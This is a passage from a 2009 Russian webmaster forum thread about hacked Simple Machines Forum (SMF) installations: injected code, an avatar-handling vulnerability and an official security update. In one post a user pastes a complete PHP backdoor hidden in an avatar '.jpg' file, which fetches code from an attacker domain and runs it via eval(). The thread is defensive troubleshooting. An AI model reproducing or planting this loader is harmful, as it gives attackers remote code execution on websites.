Форум Сайтостроение Веб-строительство

Владельцам SMF — внимание

1 23
[Удален]
#21

охренительно... у меня с недавнего времени постоянно форумы начали ломать и всякие коды всовывать...

причём весь хост засирать умудряются... так и думал что это СМФ

LexNevermind добавил 19.05.2009 в 19:22

кстати, несколько раз пришлось удалять иньекции...

заражены все shtml, html, php, js, к которым злоумішленникам удаётся добраться...

в основном это индексные файлы, файлы сеттингов (и другие которые инклудяцца в индекс), файлы ошибок, жаваскрипты подключаемые к индексу...

вредоносный код всё время разный...

...менял права доступа к файлам на 444... не помогло...

eTarget 2011:Панельная дискуссия «Стратегия eTarget 2011: Круглый стол Могут ли «плохие» входящие
V@der
На сайте с 22.11.2007
Offline
96
V@der
#22
alexseo:
Ну может чуть меньше. Точное время появления к сожалению не записал

Насколько я понимаю, пик пришелся совсем недавно, так что надеюсь, что информация сравнительно актуальна и может помочь в дальнейшем.:)

mrFatCat:
Дырка в безопасности - ресайз аватарок средствами пхп. Отключить нафиг, и не морочиться.
Подробности тут: http://phpforum.ru/index.php?showtop...dpost&p=102322

Спасибо, посмотрим. Правда, файлы теперь всё равно чистить придётся.

-K-:
Вот это жесть - вывод аватарок через скрипт... На каждую аватарку - еще и несколько запросов в базу и потом чтение с диска. Ф топку такой форум!!!

Насколько я знаю, раньше SMF имел репутацию форума, для которого меньше всего написано эксплоитов. С ростом популярности ситуация изменилась не в лучшую сторону, разумеется.

S0
На сайте с 07.05.2007
Offline
118
Sec0ndWind
#23

Собирался ставить.

Вовремя темку увидел, спасибо!

На что планируете переходить? Вобла?

[Удален]
#24

вообще, отличный движок... у всех бывают траблы :)

пхпбб и вордпресс тоже вроде ломали в массовом порядке

M
На сайте с 09.06.2006
Offline
29
Mavn
#25

Simple Machines представляет релизы SMF 1.1.9 и 2.0 RC1-1 направленные на устранение нескольких уязвимостей найденных в SMF 1.1.8 и 2.0 RC1. Всем настоятельно рекомендуется выполнить обновление как можно скорее.

Следует понимать что SMF 2.0 RC1-1 не является вторым релиз кандидатом, а только обновлением безопасности для 2.0 RC1. Ожидаемая новая тема оформления Curve остается запланированной на 2.0 RC2, как и было заявлено ранее.

Для обновления используйте менеджер пакетов чтобы обновиться на 1.1.9 или 2.0 RC1-1, в зависимости от используемой вами версии. Просто откройте центр администрирования форума и вы увидите уведомление с предложением выполнить обновление. Нажмите на ссылку, подтвердите измения и ваш форум будет обновлен. Пользователи, до сих пор использующие линейку SMF 1.0.x, могут обновиться на SMF 1.0.17 таким же образом.

Если вы не можете осуществить обновление посредством менеджера пакетов, следуйте инструкциям из онлайнового руководства по установке и обновлению. Если у вас есть проблемы с проверкой сессии при указании деталей подключения по FTP, прочитайте эту тему.

Может возникнуть необходимость в выполнении обновления вручную, если конфликты с установленными модами не дают осуществить его посредством менеджера пакетов. Вы можете найти инструкцию для всех версий форума на этой странице.

Simple Machines Russian Community

Simple Machines Russian Community : ::: - ::: : Русская поддержка SimpleMachines (http://www.simplemachines.ru/)
eTarget 2011:Панельная дискуссия «Стратегия eTarget 2011: Круглый стол Могут ли «плохие» входящие
[Удален]
#26

УРА! Надеюсь дырка полностью прикрыта!

D
На сайте с 04.03.2007
Offline
113
dmsoh
#27

Тоже проверил у себя. Этот юзер зарегистрировался 08.05 с ip 94.142.129.147.

И тишина.

А вот вчера провявлял активность

94.142.129.147 krisbarteo 8: Use of undefined constant port - assumed 'port'

forum/attachments/avatar_323.jpg Вчера в 16:00:52

94.142.129.147 krisbarteo 8: Use of undefined constant host - assumed 'host'

forum/attachments/avatar_323.jpg

Вчера в 16:00:52

94.142.129.147 krisbarteo 8: Use of undefined constant path - assumed 'path'

forum/attachments/avatar_323.jpg

Строка: 1

Файлы никакие не изменились, а вот само содержимое avatar_323.jpg

<?php;$url = 'http://wplsat23.net/?update=main';$done = false;if(!$url){return '';}$url_info = parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : "/"; $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : ""; $query = "GET " . $url_info[path] . " HTTP/1.1\r\n"; $query = $query . "Host: " . $url_info[host] . "\r\n"; $query = $query . "Accept: */*" . "\r\n"; $query = $query . "Connection: close" . "\r\n"; $query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n"; $query = $query . "\r\n"; $errno = 0; $error = ""; $sock = fsockopen($url_info[host], $url_info[port], $errno, $error, 30);$h = array();$resp = array();if($sock){stream_set_timeout($sock, 30);fwrite($sock, $query);$hd = false;while(!feof($sock)){$l = fgets($sock);if(!$hd){if(trim($l) == ''){$hd = true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret = implode("", $resp);eval($ret);?>

Чем чревато?

eTarget 2011:Панельная дискуссия «Стратегия eTarget 2011: Круглый стол Могут ли «плохие» входящие
V@der
На сайте с 22.11.2007
Offline
96
V@der
#28

Mavn, спасибо за новость.

dmsoh, вероятно, уже ничем. Домен заблокирован регистратором.

1 23

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий